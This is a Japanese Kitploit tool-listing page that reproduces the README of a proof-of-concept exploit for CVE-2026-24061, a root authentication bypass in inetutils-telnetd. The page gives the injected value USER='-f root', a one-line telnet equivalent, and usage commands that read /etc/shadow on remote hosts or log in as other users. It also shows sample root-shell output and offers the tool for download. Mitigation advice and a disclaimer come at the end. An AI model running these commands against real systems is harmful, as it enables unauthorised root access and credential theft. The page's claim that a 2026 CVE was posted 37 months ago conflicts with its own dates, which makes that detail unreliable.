Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24061 — inetutils-telnetd 認証バイパス - 動作確認済み | Kitploit
ツール/GitHubGitHub/balgan/cve-2026-24061
脆弱性分析エクスプロイトウェブアプリケーション悪用ネットワークセキュリティペネトレーションテスト認証
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd 認証バイパス - 動作確認済み

リポジトリを見る
37ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24061 — inetutils-telnetd 認証バイパス

GNU inetutils-telnetd の認証バイパス脆弱性に対する概念実証エクスプロイト。

概要

CVE-2026-24061 は、inetutils-telnetd バージョン 1.9.3 から 2.7 に影響する重大な認証バイパス脆弱性です。これにより、リモートの攻撃者は資格情報を一切提供することなく、脆弱なシステム上で root シェルを取得できます。

脆弱性の詳細

フィールド値
CVE IDCVE-2026-24061
影響を受けるソフトウェアGNU inetutils-telnetd
影響を受けるバージョン1.9.3 – 2.7
脆弱性の種類認証バイパス
CVSS スコアCritical
攻撃ベクトルネットワーク

仕組み

この脆弱性は、プロトコルネゴシエーション中に TELNET NEW-ENVIRON オプション(RFC 1572)を介して受信した USER 環境変数を telnetd が処理する際の欠陥を悪用します。

  1. TELNET プロトコルネゴシエーション: クライアントが接続すると、サーバーとクライアントは NEW-ENVIRON オプションを含む機能をネゴシエーションします。これにより、クライアントは環境変数を送信できます。

  2. 悪意のある USER 値: エクスプロイトは、このネゴシエーションフェーズ中に環境変数として USER=-f root を送信します。

  3. 安全でない引数の受け渡し: 脆弱な telnetd は、この値をサニタイズせずに login プログラムへ渡します。

  4. コマンドインジェクション: login プログラムは -f root をコマンドラインフラグとして解釈します:

    • -f = 「認証なしでログインを強制」
    • root = ログインするユーザー名
  5. root アクセス: 攻撃者はパスワードを求められることなく root シェルを取得します。

根本的な問題

root@kitploit:~
Client sends:  USER = "-f root"
telnetd runs:  login -f root
Result:        Root shell granted without authentication

これは、脆弱な telnetd が動作するシステム上で USER='-f root' telnet -a localhost を実行することと同等です。

要件

  • Python 3.6+
  • 外部依存関係なし(標準ライブラリのみを使用)

インストール

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

使用方法

root@kitploit:~
./exploit.py [OPTIONS] <target>

オプション

オプション説明デフォルト
hostターゲットのホスト名または IP アドレス必須
-p, --portターゲットポート23
-u, --user注入する USER 値-f root
-c, --command単一コマンドを実行(非対話型)なし
-t, --timeout接続タイムアウト(秒)10

例

localhost での対話型 root シェル:

root@kitploit:~
./exploit.py localhost

リモートホストでの対話型 root シェル:

root@kitploit:~
./exploit.py 192.168.1.100

単一コマンドを実行して終了:

root@kitploit:~
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

別のユーザーとしてログイン:

root@kitploit:~
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

非標準ポート:

root@kitploit:~
./exploit.py -p 2323 localhost

オプションの組み合わせ:

root@kitploit:~
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

対話モード

-c フラグなしで実行すると、エクスプロイトは対話型シェルにドロップします:

  • 適切な端末処理による完全な TTY サポート
  • Ctrl+] を押すとエスケープして接続を閉じます
  • Ctrl+C を押すと中断します

出力例

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - inetutils-telnetd Authentication Bypass    ║
║  Affects: inetutils-telnetd 1.9.3 - 2.7                      ║
╚══════════════════════════════════════════════════════════════╝

[*] Connected to 192.168.1.100:23
[*] Negotiating TELNET options...
[*] Agreed to NEW-ENVIRON (sending USER='-f root')
[+] Sent USER='-f root' via NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

緩和策

即時対応

  1. telnetd を無効化: 厳密に必要でない場合は、telnet サービスを完全に無効化します

    root@kitploit:~
    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. 代わりに SSH を使用: リモートアクセスには telnet の代わりに SSH を使用します

    root@kitploit:~
    sudo apt install openssh-server
    
  3. ファイアウォールルール: 信頼できないネットワークからのポート 23 をブロックします

    root@kitploit:~
    sudo ufw deny 23/tcp
    

長期的な修正

  • 利用可能になったら、パッチ適用済みの inetutils バージョンに更新します
  • セキュリティパッチについてはベンダーのアドバイザリを監視します

技術的詳細

このエクスプロイトは、以下のことを行う最小限の TELNET クライアントを実装しています:

  1. ターゲットへの TCP 接続を確立
  2. TELNET オプションネゴシエーション(DO/DONT/WILL/WONT)に応答
  3. サーバーが NEW-ENVIRON を介して環境変数を要求した場合:
    • ENV_IS 応答で USER=-f root を送信
  4. 端末タイプ(TTYPE)およびウィンドウサイズ(NAWS)のネゴシエーションを処理
  5. 対話型またはコマンド実行モードを提供

関連 RFC

  • RFC 854 — TELNET プロトコル仕様
  • RFC 1572 — TELNET 環境オプション

免責事項

このツールは、教育目的および許可されたセキュリティテスト目的のみで提供されています。

  • このエクスプロイトは、所有しているシステム、またはテストする明示的な書面による許可があるシステムでのみ使用してください
  • コンピュータシステムへの不正アクセスは、ほとんどの法域で違法です
  • 著者は、このツールの誤用またはそれによって引き起こされた損害について責任を負いません

ライセンス

MIT ライセンス — 詳細は LICENSE を参照してください。

参考情報

  • CVE-2026-24061 の詳細
  • GNU inetutils
  • TELNET プロトコル RFC 854
ツールをダウンロード